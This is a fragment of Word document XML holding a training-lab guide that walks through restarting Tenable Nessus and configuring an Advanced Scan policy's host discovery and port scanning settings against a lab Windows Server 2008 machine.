        </w:rPr>
        <w:t> --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Administrative Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and restart </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tenable Nessus</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> service. Once done, reload the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103936C9" w14:textId="46E2B318"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03EF1B43" wp14:editId="5E8F9F64">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1132427311" name="図 4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7DF765DA" w14:textId="37BA2B67"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06F59A75">
          <v:shape id="_x0000_i1296" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId32" w:name="DefaultOcxName12" w:shapeid="_x0000_i1296"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Welcome to Nessus Essentials pop-up appears as shown in the screenshot, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B5C2D" w14:textId="5F826395"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17332810" wp14:editId="0A184100">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="820921876" name="図 4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29DBE71E" w14:textId="50A4AC42"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="2094B213">
          <v:shape id="_x0000_i1295" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId34" w:name="DefaultOcxName13" w:shapeid="_x0000_i1295"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>After successful login, go to Nessus </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Create a new policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743E2949" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>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t>If any notifications appear at the top right corner of the window, ignore them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2C8FD" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t>Nessus will automatically log off if you leave the browser window idle for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> mins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA541F1" w14:textId="5DEE4652"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03804897" wp14:editId="06AAB4FF">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1947415559" name="図 4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64DF7E95" w14:textId="5CC05AE2"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6B6D797B">
          <v:shape id="_x0000_i1294" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId36" w:name="DefaultOcxName14" w:shapeid="_x0000_i1294"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Policy Templates window</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> appears with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Scanner Templates</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> as shown in the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0817A2" w14:textId="6550D522"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61DA5F77">
          <v:shape id="_x0000_i1293" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId37" w:name="DefaultOcxName15" w:shapeid="_x0000_i1293"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Scanner</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> section, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advanced Scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F8534" w14:textId="66705261"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118D34C5" wp14:editId="4A8188F7">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="348684493" name="図 4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392616B3" w14:textId="0B224C18"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712E298D">
          <v:shape id="_x0000_i1292" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId39" w:name="DefaultOcxName16" w:shapeid="_x0000_i1292"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advanced Scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> policy window appears displaying the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> tab. In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Basic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> settings under the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> section, specify a policy name in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> field (here, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System_Scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) and give a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> of the policy. Once done, leave the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> section with the default setting and click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in the left pane. In this lab, we will be scanning </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advertisement Dept machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (Windows Server 2008).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05419FB5" w14:textId="3797F978"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12FD0B13" wp14:editId="5CDA23B0">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1435183296" name="図 4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41988B97" w14:textId="6E3509C2"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109E8D54">
          <v:shape id="_x0000_i1291" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId41" w:name="DefaultOcxName17" w:shapeid="_x0000_i1291"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once you click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DISCOVERY</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, it will drop-down a list of 3 options i.e., Host Discovery, Port Scanning, and Service Discovery. Now we are going to configure </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Host Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> settings. In the Host Discovery settings, toggle the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ping Remote Host</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> option to turn it off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142FF979" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>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t>Scroll down if you want to view the rest of the settings in Host Discovery module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8253BA" w14:textId="64ADB731"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2DA0968D" wp14:editId="55EC48B2">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1727016058" name="図 3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15D2C5F6" w14:textId="29066FE3"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04BC5A32">
          <v:shape id="_x0000_i1290" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId43" w:name="DefaultOcxName18" w:shapeid="_x0000_i1290"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Port Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module, check the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Verify open TCP ports found by local port enumerators</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> option. Leaving the other settings to default, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ASSESSMENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> from the left pane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52013B78" w14:textId="3BD16FC0"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48DCE1C4" wp14:editId="0151D7D3">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="516398273" name="図 3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145340EA" w14:textId="48E23064"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="5CCDFF7B">
          <v:shape id="_x0000_i1289" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId45" w:name="DefaultOcxName19" w:shapeid="_x0000_i1289"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once you click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
